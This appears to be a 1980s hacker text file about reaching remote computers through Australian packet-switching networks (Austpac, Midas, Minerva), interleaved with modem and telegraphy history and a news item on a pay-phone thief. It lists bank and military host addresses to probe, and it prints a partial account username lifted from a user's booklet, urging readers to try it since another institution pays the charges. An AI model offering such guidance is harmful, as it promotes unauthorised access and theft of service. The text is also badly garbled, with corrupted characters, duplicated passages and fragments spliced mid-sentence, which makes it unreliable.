IPSS 2341 " PSS 2342 U.S.A. Itt 3103/3107 " YD Wui 3104 " Tymnet 3106 " Telenet 3110/3127 " Rca 3113 " Trt 3119 " Uninet 3125 " Autonet 3126 " Alaskanet 3135 " Compuserve 3132 Phew! quite a list, huh?. O.K. then, lets say then we connect to Telenet via Midas... (Note: for information of how to make international calls via Austpac, please read "HackZ6ers Notebook Part 2") MIDAS *(logon here) > 3110 <---- code for Telenet in U.S.A You will get a short signon message, then the prompt @ You are now logged into the Telenet network in the U.S.A! Amazing! O.K., I hear 'Now what?'. From Telenet, you can select a large amount of systems! Here are a few of the better ones: C31285 <=- Try this one first -=> C30155 Newsnet 75 C31240 SLVAX 1 (Va[/x machine) C31233 Credit Information Corp. C31250 American hospital supply C617138 <-=- TRY THIS! -=-> C21220 Some business system C31243 Travenol system A C31244 Travanol system B C201220 Military data base. (ICBM stores, etc) You will be able to get access to most of these systems, by typing 'DEMO' or pressing at most of the prompts. (Except for C201220!!). A larger, more complete list of Telenet systems: (Note \: when the Austpac USERNAME was available, I tried as many of these as possible. I only got half way through the list. Note that a '>' before the number means I have connected to that system, and that '+' means there was some sort of error. Nothing means I did not try that system) > C 20120-VM 370 ONLINE > C 201220-MILITARY DATA BASE + C 20124 > C 20125-NJIT ELECTRONIC INFORMATION EXCHANGE SYSTEM > C 20130 > C 20133 + C 20138 + C 20148 + C 20154 + C 20165 > C 20166 > C ]v6 20167-WARNER COMPUTER SERVICES > C 20168-WARNER COMPUTER SERVICES > C 20171-RDS #12 > C 20182-BANKERS TRUST CUSTOMER SERVICE > C 20184-DB003I + C 20222 + C 20225-COMSHARE "COMMANDER II" + C 20246 > C 20247-GSD TIMESHARING + C 20270-GSD TIMESHARING + C 202124-GENERAL MOTORS WARREN + C 202133 + C 202138 (TYPE .HELP *) > C 202139-TRI-SMP (TYPE .HELP *) > C 202140-TRI-SMP (TYPE .HELP *) + C 202143 > C 202144-TRI-SMP (TYPE .HELP *) + C 202148 + C 202149 + C 202175-HONEYWELL + C 202222-GM ^m֗ PARTS + C 202229-PRIMENET > C 20321-WYLBUR > C 21220-SOME BUSINESS SYSTEM > C 21221-PRIMENET > C 21224-PRIMENET + C 21225-INTERACTIVE MARKET SYSTEMS + C 21226-INTERACTIVE MARKET SYSTEMS > C 21228-BURROUGHS NYC DATA CENTER + C 21229-LANDART SYSTEMS > C 21231-E.F.HUTTON (VM/370 ONLINE) + C 21233-UNIVAC 1100 + C 21247 + C 21248 > C 21252-PRIMENET + C 21253-VM/370 ONLINE > C 21256-CITIBANK CASH MANAGER > C 21264-CITICASH MANAGER INTERNATIONAL C 21265-CITICASH MANAGER INTERNATIONAL + C _L 21269 + C 21281-BANKERS TRUST CUSTOMER SERVICE + C 21284-DATAMOR TIME SHARING + C 21288-S-K WDC SYSTEM 1/ONLINE + C 212136-(TYPE NEW/TSC) > C 212141 + C 212142 > C 212151-CITICASH MANAGER INTERNATIONAL + C 212152 C 21255-PRIMENET C 21256-PRIMENET C 212160-TELSTAT SIGMA 6 C 212167-RSTS V.7.0-07 C 212168-RSTS V.7.0-07 C 212171 C 212172 C 21284-DATAMOR TIME SHARING C 21325-PRIMENET C 21335-MARKETRON RESEARCH AND SALES C 21336-MARKETRON RESEARCH AND SALES C 21341 J) C 21360 C 21365 C 21366 C 21370-XCC-WEST SYSTEM X2 C 21371-XCC-WEST SYSTEM X3 C 21372-XCC-WEST SYSTEM X3 C 21373-XCC-WEST SYSTEM X1 C 21375-XCC-WEST SYSTEM X2 C 21379-INTERACTIVE SYSTEM/ONE C 21384 C 21385 C 21386-IAS PROGRAM DEVELOPMENT SYSTEM C 21388 C 213105 C 21520-TPF&C ONLINE C 21534-PRIMENET C 21538 C 21722 C 21725 C 21726-U OF I COMPUTING SERVICES C 30121-NASA RECON > C 30124-SOURCE SYSTEM 10 C 30126-DISTRIBUTIVE NETWORK C 30134-a,is seeing how quickly you can work out what the remote computer want to 'see' - and how to make your machine respond. Given the number of popular computers on the market, and the number of terminal emulators for each, it is difficult to make a series of specific recomendations. What follows therefore, is a list of the sort of facilities you should look for: On-line help, Text buffer, Half/Full Duplex (Echo on/off), Data Format/Parity Setting, Show Control Characters, Macros/Keysb\troke Multipliers, Auto-dial, Format screen, Re-assign keyboard, File protocols, File transmissions, Specific terminal emulations, Bauddot characters, Viewdata emulation. MODEMS Every account of what a modem is and does begins with the classic explanation of the ferivation of the term: let this be no exception. Modem is a contraction of modulator-demodulator. A modem taking instructions from a computer (pin 2 on RS232C) converts the binary 0s and 1s into specific single tones, ac%ccording to which 'standard' is being used. In RS232C/V24, binary 0 (on) appears as positive volts and binary 1 (off) appears as negative volts. The tones are then fed, either acoustically via the telephone mouth-piece into the telephone line, or electrically, by generating the electrical equivalent direct onto the line. This is the modulating process. In the demodulating stage, the equipment sits on the phone line listening for occurences of pre-selected tones (again accordingd s to whichever 'standard' is in operation) and, when it hears one, delivers a binary 0 or binary 1 in the form of positive or negative voltage pulses into pin 3 of the computer's serial port. This explanation holds true for modems operating at up to 1200 baud; above this speed, the modem must be able to originate tones, and detect them according to phase as well, but since higher-speed working is unusual in dial-up ports - the hacker's special interest, we can leave this matter teXo one side. The modem is a relatively simple bit of kit: on the transmit side it consits of a series of oscillators acting as tone generators, and on receive has a series of narrow band-pass filters. Designers of modems must ensure that unwanted tones do not leak into the telephone line (exchanges and amplifers used by telephone companies are sometimes remotely controlled by the injection of specific tones) and also that on the receive side, only the distinct tones used for commfunications are 'interpreted' into binary 0s or 1s. The other engineering requirements are that unwanted electrical currents do not wander down the telephone cable (to the possible risk of phone company employees) or back into the user's computer. Until relatively recently, the only UK source of low-speed modems was British Telecom. The situation is much easier now, but de-regulation of 'telephone line attachments', which include modems, is still so recent that te ordinary custom gKer can easily become confused. Moreover, modems offering exactly the same serivce can vary in price by over 300%. Strictly speaking, all modems connected to the phone line should be officially approved by BT or other appopriate regulatory authority. At 300 baud, you have the option of using direct-connect modems whcih are hard-wired into the telephone line, an easy enough exercise, or using a acoustic coupler in which you place the telephone hand-set. Acoustic couplers are inher!hDently prone to interference from room-noise, but are useful for quick lash-ups and portable operation. Many acoustic couplers operate only in 'originate' mode, not in 'answer'. Newer commercial direct-connect modems are cheaper than acoustic couplers. At higher speeds acoustic coupling is not recommended, though a 75/1200 acoustic coupler produced in asociation with the Prestel Micronet service service is not too bad, and is now exchanged on the second-hand market very cheaply i"i [ndeed. I prefer modems that have proper status lights - power on, line seized, transmit and receive indicators. Hackers need to know what is going on more than most users. British Telecom markets the UK service under the name of Datel - details are given in Appendix V. BT's (RAD: If you have forgotten, BT is not Blue Thunder!) methods of connecting modems to the line are either to hard-wire the junction box (the two outer-wires are the ones you usually need) - a 4-rin#~g plug and associated socket (type 95A) for most modems, a 5-ring plug and asociated socket (type 96A) for Prestel applications (note that the fifth ring isn't used) - and, for all new equipment, a modular jack, but of course it is not compatible. ---- End of Chapter 3 ---- socket (tyling is not recommended, though a 75/1200 acoustic coupler produced in asociation with the Prestel Micronet service service is not too bad, and is now exchanged on the second-hand market very cheaply iUL] =- -=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=- >>>>>>>>>>>>>>> Midas <<<<<<<<<<<<<<<< Midas stands for 'Multi mode, international data acquisition service' (phew). It is simply a world wide version of Austpac. It allows you to connect to countries all over the world. I do not yet have a password for this system, but maybe later on... You connect to it through one of the following numbers: Midas: (02) 20991 300/300 (02) 20992 l:?actise. One difficulty that frequently arises with newer or portable computers is that some manufacturers have abondoed the tradional 25-way D-connector, largely on the grouds of bulk, cost and redundancy. Some European computer and peripheral companies favour connectors based on the DIN series (inverted in Germany), while others use D-connector with fewer pin-outs. There is no standardization. Even if you see two physically similar connectors on two devices, regard them wimQ?th suspicion. In each case, you must determine the equivalents of: Characters leaving computer (Pin 2) Characters arriving at the computer (Pin 3) Signal ground (Pin 7) You can usually set the speed of the port from the computer's operating system and/or from Basic. There is no standard way of doing this; you must check your handbook and manuals. Most RS232C ports can handle the following speeds of the port from the computer's operating system and/or from Basic. There is no standard nJway of doing this; you must check your handbook and manuals. Most RS232C ports can handle the following speeds: 75,110,300,600,1200,4800,9600 and sometimes 50 and 19200 baud as well. These speeds are selectable in hardware by appropriate wiring of a chip called a baud-rate generator. Many modern computers let you select speed in hardware by means of DIL switch. The higher speeds are used either for driving printers or for direct computer-to-computer or computer-to-peripheral connectioϖons. The normal maximum speed for transmitting along phone lines is 1200 baud. (RAD: That may be normal, but faster speeds are used all the time.) Depending on how your computer has been set up, you may be able to control the speed from the keyboard - a bit of firmware in the computer will accept micro-instructions to flip transistor switches controlling the wiring of the baud-rate generator. Alternatively, the speeds may be set in pure software, the micro deciding at what speepd to feed information into the serial port. In most popular micro implmentations the RS232C cannot support split-speed working (different speeds for receive and transmit). If you set the port up for 1200 baud, it has to be 2100 receive and transmit. This is a nuisance in Europe, where 75/1200 is in common use both for viewdata systems and for some on-line services. The usual way round is to have special terminal emulators software, which requires the RS232C hardware to operate q|+at 1200/1200 and then slows down (usually the micro's tranmit path) to 75 baud in software by means of a timing loop. An alternative method relies on a special modem, which accepts data from the computer at 1200/1200 and then performs the slowing-down to 75 baud in its own internal firmware. TERMINAL EMULATORS We all need a quest in life. Sometimes I think mine is to search for the perfect software package to make micros talk to the outside world. As in all such quests, the goal is orE >>>>>>>>>>>>> Minerva <<<<<<<<<<<<<< Minerva is a large, powerful data base, which is accessed through Midas (explained later). I have not yet fully explored this system, but I can tell you that it has a brilliant multi-user CHAT facility. This willCz allows a group of people to hold a conversation with each other. You logon to Minerva via Midas. The numbers are: Midas: (02) 20991 300/300 (02) 20992 1200/1200 (02) 20993 1200/75 *NOTE* Even though these are (02) numbers, they are a FREE call! (Listen when you call... in some areas you get no STD beeps...) When you get a carrier, connect, and type a few '=' signs until you get: 'MIDAS'. Then type the logon + string for Minerva. It all looks like this: MIDAS *N07MAIL-. \____/ Note that this part does not echo 200000 COM Welcome to Minerva. Please logon >LOGON Username: And you go from there. I have the following notes on Minerva. They are associated with username/passwords, etc, but I have not been able to link these together. Username: ISG009 Other info: 1071405 JSGT ISGT What all the 'other inf!H&o' is, I don't know.. Obviously the password is missing. I copied this off the front of a users 'Minerva' booklet. If you do get in, please tell me so I can update this section. Note that all charges to this account go to R.M.I.T. so don't be scared to try.. >>>>> Network access via Minerva <<<< If you want to access the world, but do not have an Austpac USERNAME, then you CAN make international calls via the Minerva NETLINK utility. Simply type NETLINK from the '"wN>' prompt, and then make your call in the syntax: C :0NUA -FCTY where NUA is the international number. Make sure that you prefix this number with a '0' (if it doesn't already have it). NOTE: For a LARGE list of NUA's, please refer to the series of SERCNET files, which should be on this system, under the names of 'PSSNETW', 'PSSGATE' and 'JANET'. -=*=-=*=-=*=-= THE END =-=*=-=*=-=*=- 1405 JSGT ISGT What all the 'other infG3xch him. He's very clever, telephone officials say, and is the only known suspect in the country that is able to pick the locks on coin boxes in telephone booths with relative ease. He is believed responsible for stealing hundreds of thousands of dollars from coin boxes in the Bay Area and Sacramento this year. The suspect has been identified by authorities as James Clark, 47, of Pennisula, Ohio, a machinist and tool-and-die maker, who is believedQ responsible for coin box thefts in 24 other states. Other companies sharing in yhr reward are Ohio Bell, Southern Bell, South Carolina Bell, South Central Bell, Southwestern Bell, Bell Telephone of Pennsylvania and U.S. West. Clark allegedly hit pay phones that are near freeways and other major throughfares. Clark, described as 5 feet 9 inches tall, with shoulder length brown hair and gold-rimmed glasses, is reported to be driving a new Chevrolet Astro van painted a dark metallic blue. He was recently in Arizona but is believed to be back in California. Written by a Tribune Staff Writer Typed by the $muggler with relative ease. He is believed responsible for stealing hundreds of thousands of dollars from coin boxes in the Bay Area and Sacramento this year. The suspect has been identified by authorities as James Clark, 47, of Pennisula, Ohio, a machinist and tool-and-die maker, who is believedHӞs convenience as much as anything. With kit like this, you will be able to get through most dial-up ports and into packet-switching through a PAD - a packet assembler/disassembler port. (It will not get you into IBM networks, because they use different and incompatible protocols; we will return to the matter of the IBM world in chapter 10.) In other works, given a bit of money, a bit of knowledge, a bit of help from friends and a bit of luck (RAD: that's 4 bits, I do belive that makev!n:hs a NIBBLE - hehehe), what is described here is the sort of equipment most hackers have at their command. You will find few products on the market labelled 'for hackers' (RAD: You may find some labelled 'for Anti-hackers' - heaven forbid! - It appears Case have what they call a HACKER CRAKER! I think it's any advanced version of their dial-guard! More later!); you must select those items that appear to have 'legitimate' bit interesting functions and see if they can be bent to th3S current values. CALL REQUEST (see later) set up a virtual call. In the previous command list, the commands above PROF will give a response. With the commands PROF and below, the only response will be the ACKNOWLEDGMENT indication of examples of these commands would be : PROF 10 SET 2:0,5:1 SET?3:0 PAR?1,5,8 or PAR? STAT When you are on Austpac, the online charges, or 'Packet switching charges' as they are known, are charged* to the business which is connected to Austpac. This is why you cannot get visitor access to Teledata via Austpac. It would be costing Teledata money, and they would have no way of knowing who to charge it to. If you have an account, then that is a different matter. You will find that most computers connected to Austpac will have pretty good front end security, because it is costing the business money for you to use their system. It is possible, or cour%Rse, to get a CLR RNA xxx error from Austpac. This means that the Reverse charges were not accepted. If you want to connect to one of these systems, you require a NUI (Network identifier code) so Austpac knows who to charge the money to. For simplicity, we shall refer to this NUI as the Austpac USERNAME. I once had such a USERNAME, but it was deleted. Another such solution is to make the call via Minerva (assuming you have an account on it.. see later for more <)info) Austpac serves all of Australia, and through it you can also get access to OTC's 'Midas' network. This allows you to make international data calls. A list of countries served by Midas follows: COUNTRY NETWORK DNIC ---------------------------------- Australia Austpac 5052 " Midas 5053 Austria Radio-Austria 2329 " Datex-P 2322 Belgium DCS 2062 Canada Teleglobe 3023 " L Datapac 3020 " Infoswitch 3029 Finland Datapak 2442 France Transpac 2080 " NTI 2081 Germany Datex-P 2624 Hong Kong Idas 4542 " " Das 4544 Japan Venus/P 4408 " DDX/P 4401 Luxemburg Luxpac 2704 New Zealand Pacnet 5301 Norway Norpak 2422 Singapore Telepac 5252 South Africa SaponkTet 6550 Sweden Telepak 2405 Switzerland Telepac 2284 " Datalink 2289 U.K. IPSS 2341 " PSS 2342 U.S.A. Itt 3103/3107 " Wui 3104 " Tymnet 3106 " Telenet 3110/3127 " Rca 3113 U.S.A. Trt 3119 " Uninet 3125 " Autonet 3126 " Alaskan6et 3135 The format for an international call is as follows: DNIC --------------- I I P DCC R NTN SS DNIC = data network identifier code (X.121) (5052 for Austpac) DCC = data country code (X.121) NN = national number (X.121) R = network identifier (2 for austpac) SS = optional sub address (0,1 or 2 digits) NTN = terminal identifier (8 digits) P = international prefix (0 for austpac) In the this format, tZhe total number of digits in the called address field must be <= 15. Some examples of international calls: ?USERNAME-026245667313330 <-- the Geonet mailbox in Germany ?USERNAME-026245300040020 <-- unknown German system ?USERNAME-026245300040029 <-- German Vax VMS 4.1 computer ?USERNAME-026245300040023 <-- Berlin University ?USERNAME-03106 <-- direct connect to Tymnet ?USERNAME-03106900061 <-- Dialog via Tymnet ?USERNAME-03106001509 <-- Orbit database via Tymnet ?USERNAME-05053200000 <-- Minerva via Midas ?USERNAME-0234275312212 <-- unknown English system ?USERNAME-03132 <-- Compuserve NOTE: For a LARGE list of NUA's, please refer to the series of SERCNET files, which should be on this system, under the names of 'PSSNETW', 'PSSGATE' and 'JANET'. Note: for more detailed information about accessing Telenet (U.S.A.) please read "Hackers Notebook part 3" Well then, now you know something about international calls via Austpac, lets get more back to home, and look at some Austpac numbers. +===============+========================+ | Number | Name | +===============+========================+ | 229221016 | unknown | | 238221000 | Teledata | | 235221000 | Computer Power Group | | 235021001 | Information Express | | 262920000 | * Medianet | | 224121000 | * Dinky Die Software | | 235221000 | CyberneMmt (?) | | 235121001 | * unknown | | 235421002 | * Telecom Research | | 235421000 | ACI | | 224421000 | Case Communications | | 211113999 | Elders Pastoral | | 211108999 | Elders Pastoral | | 232421000 | ! unknown prime | | 237221003 | Camasco Management | | 235421003 | CoCo dialup line | | 229221014 | CSR X29 Gateway | | 236620000 | Telememo | (You are connecting to) is busy All Terminals occupied. CLR DTE xxx When the system you connected to disconnects you. CLR NC xxx A) A fault in Austpac. B) Austpac is congested. CLR NP xxx No port CLR RNA xxx Reverse charges not accepted. CLR RPE xxx Remote processor error. CLR INV xxx Incorrect network Identification number. ERROR ERR Invalid Format. There are also a few other commands which can be issued from Austpac?ga. The major one is the SET command. The syntax is SET x:y where x ranges from 1 to 18 and y is the corresponding argument. A list of the SET command tables follows: #1 PAD recall using a character. This is the char to change from transfer to command mode. 0 not possible 1 char (ie CTRL P) 32-126 Possible; using one graphic char defined by user #2 Echo of characters by PAD 0 no echo 1 echo #3 Selection 1 of data forwarding signals. This is the char(s) that when received take chars in PAD buffer and assembles it into a packet. 0 no data forwarding signal 2 Char 126 All chars in column 0 and 1 (of IA5) and char 6 Chars 18 Chars #4 Selection of idle timer delay. Timeout time from last char to when the input buffer is assembled and sent. 0 no timer delay 1-255 value in twentieths of a second.  K(O#5 Ancillary device control. This enables austpac to send char terminal x-on/x-off. 0 no use of x-on (DC1,CTRL Q) & x-off (DC3,CTRL S) 1 use x-on/x-off #6 Control of PAD service signals. Determines whether PAD indecations are sent to char term. 0 no PAD service sigs are transmitted 1 PAD service signals are transmitted 5 PAD service signals and the prompt PAD service signals are transmitted. #7 Selection of operation of PAD on receipt of break sign ual from the char term. 0 nothing 1 interrupt 2 reset 8 escape from data transfer mode 21 discard output, int and indication of break #8 Discard output. Determines whether you get data from remote 1 discard output 0 normal data delivery #9 Padding after 0 no padding after 1-7 # of padding chars inserted after #10 Line folding. Line length. Sends after x chars 0 no line folding 1-255 line length #11 Binary speed of c \khar term. 0 110 bit/s 2 300 bit/s 3 1200 bit/s 6 150 bit/s 8 200 bit/s 11 1200/75 bit/s #12 Flow control of PAD. Determines whether char term can suspend output with x-on/x-off 0 no use of x-on/x-off (CTRL Q & S) 1 use of x-on/x-off #13 LF insertion after CR. 0 no LF 1 insert LF after CR 4 insert LF after echo of CR to char term 5 insert LF after transmission to the char term and after echo of CR 6 insert LF in data str ]jeam after CR from char term and after echo of a CR to the char term 7 insert LF in data stream to and from char term and after echo of a CR to char term #14 Padding after LF 0 no padding after LF 1-7 # of padding chars inserted after LF (applies only to data transfer mode) #15 Editing. 0 no use of editing in data transfer mode 1 use of editing in data transfer mode #16 Character delete. 0-127 one char from IA5 8 char (defaultY/) #17 Line delete. 0-127 one char from IA5 24 char (default) #18 Line display. 0-127 one char from IA5 42 char <*> (default) IA5 = CCITT international alphabet # 5 (approx ASCII) char term = C-DTE (officially) = out computer terminal The above parameters are changable by the user. A profile is a snap-shot of all the parameters. There are 18. I won't list them all here, because it would be too long. PSTN (us) customers are usually assigned prof"xile 0 (up to 300 or 1200 bits). Videotex (1200/75) use profile 9. Profile # / Param # P |1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ---+----------------------------------------------------------- #0|1 1 126 0 1 1 2 0 0 0 na 1 0 0 0 8 24 42 #9|1 1 126 3 0 1 1 0 0 0 na 0 0 0 0 8 24 42 The first set of numbers if for profile 0, and the second set of numbers if for profile 9. These are żSthe default values. Note that if you have a USERNAME, the defaults could be different. If you look and think you'll realize that param 11 (speed) cannot be set by the user. There are also a number of other commands which can be issued. These are: COMMAND FUNCTION --------------------------- STAT to request info about a virtual call with char term (FREE or ENGAGED) CLR to clear a virtual call (CLF CONF or CLR p+ ERR) PAR? Request values of all params in list and request current value (no list=all) SET? As above except doesn't requestٶsing several different channels on one cable-length is called multiplexing and, depending on the application, the various channels can either carry several different computer conversations simultaneously or can send several bits of one computer conversation in parallel, just as though there were a ribbon cable between the two participating computers. Either way, what happens is that each binary 0 or 1 is given, not an audio tone, but a radio frequency tone. SYNCHRONOUS PROTOCOLS In t{he asynchronous protocols so far described, transmitting and recieving computers are kept in step with each other every time a character is sent, via the 'start' and 'stop' bits. In the sychronous comms, the locking together is done merely at the start of each block of transmission by the sending of a special code (often SYN). The SYN code starts a clock (a timed train of pulses) in the reciever and it is this that ensures that binary 0s and 1s originating at the transmitter are corrևectly interpreted by the reciever; clearly, the displacement of even one binary digit can cause havoc. A variety of synchronous protocols transmit so many 'extra' bits in order to avoid error, saving in transmission time under synchronous systems often exceed 20-30%. The disadvantage of synchronous protocols like in the increased hardware costs. One other complication exists: most asynchronous protocols use the ASCII code to define characters. IBM ('Big Blue') the biggest enthusiast of synchronous comms. has it's own binary code to define characters. In Appendix IV, you will find an explanation and comparision with ASCII. The hacker, wishing to come to terms with synchronous comms, has two choices: the more expensive is to purchase a protocol converter board. These are principally available for IBM PCs (RAD: A friend of mine has one for the Apple //), which has been increasingly marketed for the 'exclusive workstation' audience, where the ability I $to interface to a company's existing (IBM) mainframe has a por on to a packet-switched service; in that event, the hacker can use ordinary asynchronous equipment and protocols - the local PAD (Packet Assembler/Disassembler) will carry out the necessary transformations. NETWORKS Which brings us neatly to the world of high-speed digital networks using packet-switching. All the computer communications so far described have taken place either on the phone (voice-grade) network or on the SB' telex network. In Chapter 7. we will look at packer-switching and the opportunities of offered international data networks. We must now specify hackers' equipment in more detail. ---- End of Chapter 2 ----comms, has two choices: the more expensive is to purchase a protocol converter board. These are principally available for IBM PCs (RAD: A friend of mine has one for the Apple //), which has been increasingly marketed for the 'exclusive workstation' audience, where the ability Nlhich call up on 01921, 01922 or one of the TFA numbers. Note: it has now been proven, that 01921, 01922, 01923 and 0220991, 0220992 and 0220993 are all FREE calls, so you can most likely scrap the above TFA numbers, but they have been included for your interest. Videotext users : call requests may be preceeded by or <*> and all commands including call request can be terminated by <+> or <#> Austpac is available all the time except (currently) 11pm Tlhursday - 7am Friday. This is their maintainance window. (Melb. time). To use Austpac, dial up the Austpac number, then connect and wait for 'AUSTPAC' to appear. (Note on Toll free numbers, you must type 'H' and after connecting). Then you type in the host computer number, which starts with a "?" and is 9 digits long. It usually starts with a "2", and the second digit indicates the state in which the computer is in, eg 3 = Vic, 2= NSW, 7= Qld. etc. An examplAre would be: AUSTPAC ?238221000 <-- Host number for Teledata COM <-- Means you have been connected *** Welcome to Teledata / Press newline to log on *** and away you go with Teledata.... You may get an error with Austpac. These errors are: CLR DER xxx (Where xxx is a 3 digit #) System not available (i.e. Maintenence) CLR ERR xxx Operator error, Austpac does not understand the command You gave it. CLR OCC xxx When system",er, 1985 =- -= =- -=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=- >>>>>>>>>>>>>>> Austpac <<<<<<<<<<<<<< Ever wondered what Austpac is? Well, it is Australia's packet switching network. This means that you can access computers from all around Australia from your own home! Note that you can only access computers actually connected to the Austpac network. The numbers are: Austpac: (03) 01921 300/300 (profile 0) (03t̖) 01922 1200/1200 (profile 0) (03) 01923 1200/75 (profile 9) Toll free Austpac numbers: (TFA) Victoria: (03) 663-3771 Sydney: (02) 221-4400 Queensland: (07) 393-0788 South Aust: (08) 231-6201 West Aust: (09) 481-0819 The 'Toll free' Austpac numbers are a free call. (Note that the Toll free numbers are 300 baud only). Profile 9 is not available to users w'D pairs of tones, both 'transmitter' and 'reciever' could speak simulataneously - so that in fact, one has to talk about 'originate' and 'answer' instead. Improved electrical circuit design meant that higher speeds than 50 or 75 baud became possible; there was a moveto 110 baud, then 300 and, so far as ordinary telephone circuits are concerned, 1200 baud is now reguarded as the top limit. (RAD: in Oz, Telecom have approved 2400, and I believe that one company has a 9600 baud modeSwm, that is being tested by Telecom, for approval!!!!! 9600baud!!) The 'start' and 'stop' method of synchronising the near and far end of a communications curcuit at the beggining each individual letter has been retainfed, but common use of the 5-bit Baudot code has been replaced by a 7-bit extended code which allows for many more characters, 128 in fact. Lastly, to reduce errors in transmission due to noise in the telephone line and circuitry, each letter can be checked by Qthe use of futher bit (the parity bit), which adds up all the bits in the main character and then, depending on whether the result is odd or even adds a binary 0 or 1. The first 0 is the start bit; then follows 7 bits of the actual letter code (1001011); then the parity bit; then the final 1 is the stop code. This system, asynchronous start-stop ASCII (the common name for the alphabetic code), is the basis for nearly all micro-based communications. The key variations relate to: ,BIT-LENGTH; you can have 7 or 8 data bits. PARITY; (it can be even or odd, or entirely absent), TONES. The tones used to signify binary 0 and binary 1, and which computer is in 'originate' and which computer is in 'answer', can vary according to the speed of the transmission and also to whether the service is used in North America of the rest of the world. (Briefly, most of the world uses tones laid down by the Geneva-based organisation, CCITT, a specialised agency of the Internationiŭal Telecommunications Union; whereas in the United States and most parts of Canada, tones determined by the telephone utility, colloquailly known as Ma Bell, adopted.) The following table gives the standards and tones in common use: Service Speed Duplex Transmit Recieve Answer Designator 0 1 0 1 -------------------------------------------------------------------- V21 ORIG 300 * FULL 1180 980 1850 1650B0 - V21 ANS 300 * FULL 1850 1650 1180 980 2100 V23 (1) 600 HALF 1700 1300 1700 1300 2100 V23 (2) 1200 F/H ** 2100 1300 2100 1300 2100 V23 BACK 75 F/H ** 450 390 450 390 - BELL 103 OR 300 * FULL 1070 1270 2025 2225 - BELL 103 AN 300 * FULL 2025 2225 1070 1270 2225 BELL 202 1200 HALF 2200 1200 2200 1200 2025 -------------------------------------------------------------------- * any speed up to 300 baud, can also include 75 and 110 baud services. ** services can either be half-duplex at 1200 baud or asymetrical full duplex, with 75 baud originate and 1200 baud recieve (commonly used as viewdata user) or 1200 transmit and 75 receive (viewdata host). -------------------------------------------------------------------- HIGHER SPEEDS 1200 baud is usually reguarded as the fastest speed possible on an ordinjeary voice-grade telephone line. Beyong this, noice on the line due to the switching circuits at the various telephone exchanges, poor cabling, etc. making accurate transmission difficult. Indeed, at higher speeds it becomes increasingly important to use transmission protocols that include error correction. Error correction techniques usually consist of dividing the tranmission stream into a series of blocks which can be checked, one at a time, by the recieving computer. The 'par}Iity' system mentioned above is one example, but obviously a crude one. The difficulty is that the more secure an error-correction protocol becomes, the greater becomes the overhead in terms of numbers of bits transmitted to send just one character from one computer to another. Thus, in the typical 300 bit situation, the actual letter is defined by 7 bits, 'start' and 'stop' account for another two, the check takes a further one - ten in all. After a while, what you gain in speed in the speed with which each actual BIT is transmitted, you lose, because so many bits have to be sent to ensure that a single CHARACTER is accurately received! Although some people risk using 2400 baud on ordinary telephone lines - the jargon is PTSN (Public Telephone Switched Network) - this means using expensive modems. Where higher speeds are essential, leased circuits, not available via dial-up, become essential. (RAD: There are people using 2400 baud modems now very sucessfull=y, in fact as said earlier Telecom are approving a 9600 baud modem! for use on the PTSN!). The leased circuits is paid for on a fixed charge, not a charge based on time-connected. Such circuits can be 'conditioned', for example by using special amplifiers, to support the higher data rate. For really high speed transmissions, however, pairs of copper cable are inadequate. Medium speed is obtainable by the use of coaxial cable (a little like that used for tv antenna hook-ups. Impoy of exchanges. * Data must be easily capable of accurate recovery at the far end. * Sending and receiving computers must be synchronized in their working. * The mode in which data is transmitted must be one understood by all computers accepting a standard protocol may mean adopting the speed and efficency of the slowest. The present 'universal' standard for data transmission use by microcomputers and many other services uses agreed tones to signify binary 0 and binary 1, th#e ASCII character set (also known as International Alphabet No. 5), and an asynchronous protocol, whereby the transmitting and receiving computers are locked in step every time a character is sent, not just at the beginning of a transmission stream. Like nearly all standards, it is highly arbitary in its decision and derives its importance simply from the fact of being generally accepted. Like many standard, too, there are a number of subtle and important variations. To see how bx5the standard works, how it came about and the reasons for the variations, we need to look back a little into history. THE GROWTH OF TELEGRAPHY The essential techniques of sending data along wires has a history of 150 years, and some of the common terminology of modern data transmission goes right back to the first experiments. The earliest form of telegraphy, itself the earliest form of electrical message sending, used the remote actuation of electrical relays to leave marks of EAa strip of paper. The letters of the alphabet were defined by the patterns of 'mark' and 'space'. The terms have come through to the present, to signify binary conditions of '1' and '0' respectively. The first reliable machine for sending letters and figures by this method dates from the 1840; the direct successor of that machine, using remarkably unchanged electo-mechanical technology and a 5-bit alphabetic code, is still widely used today, as the telex/teleprinter/teletype. The mar (MUk and space have been replaced by holes punched in paper-tape: larger holes mark mark, smaller ones for space. Synchoronisation between sending and receiving stations is carried out by beginning each letter with a 'start' bit (a space) and concluding it with a 'stop' bit (mark). The 'idle' state of a circuit is thus 'mark'. In effect, therefore, each letter requires the transmission of 7 bits: .**...* (letter A: .=space; *=mark) of which the first . is the start bit, the last * is th 2e stop bit and **... is the code for A. This is the principle means for sending text messages around the world, and the way in which news reports are distributed globably. And, until thrid-world countries are rich enough to afford more advanced devices, the technology will survive. EARLY COMPUTER COMMUNICATION. When, 110 years after the first such machine came on line, the need arose to address computers remotely, telegraphy was the obvious way do so. No one expected computers i sT"n the early 1950s to give instant results; jobs were assembled in batches, often fed in by means of paper-tape (another borrowing from telex, still in use) and then considered quite miraculous. So the first use use of data communications was almost exculively to ensure that the machine was fed with up-to-date information, not for the machine to send the results out to those who might want it; they could wait for the 'print-out' in due course, borne to them with considerable solemnit gy by the computer experts. Typical communications speeds were 50 or 75 baud. (The baud is the mesure of speed of data transmission; specifically, it refers to the number of signal level changes per second and is thus not the same as bits-per-second.) These early computers were, of course, in today's jargon, single-user/single task; programs were fed by direct machine coding. Gradually, over the next 15 years, computers spawned milti-user capabilities by means of time-sharing tec zfhniques, and their human interface became more 'user-friendly'. With these facilities grew the demand for remote access to computers, modern data communications began. Even at the very end of the 1960s when I had my own very first encounter with a computer, the links with telegraphy were still obvious. As a result of of happenstance, I was in a Government-run research facility to the south-west of London, and the program I was to use wass located on a computer just to the north gsOof Central London; I was sat down in front of a battered teletype - capitals and figures only, and required not inconsiderable physical force from my smallish fingers to actuate the keys of my choice. As is was a teletype outputting on to a paper roll, mistakes could not as readily be erased as on a VDU, and since the sole form of error reporting consisted of a solitary ?, the episode was more frustrating then thrilling. VDUs and good keyboards were then far too expensive for 'ordina =ry' use. THE TELEPHONE NETWORK But by the time all sorts of changes in datacomms were taking place. The telex and telegraphy network, originally so important, had long been overtaken by voice-grade telephone circuits (Bell's invention dates from 1876). For computer communications, mark and space could be indicated by different audio tones, 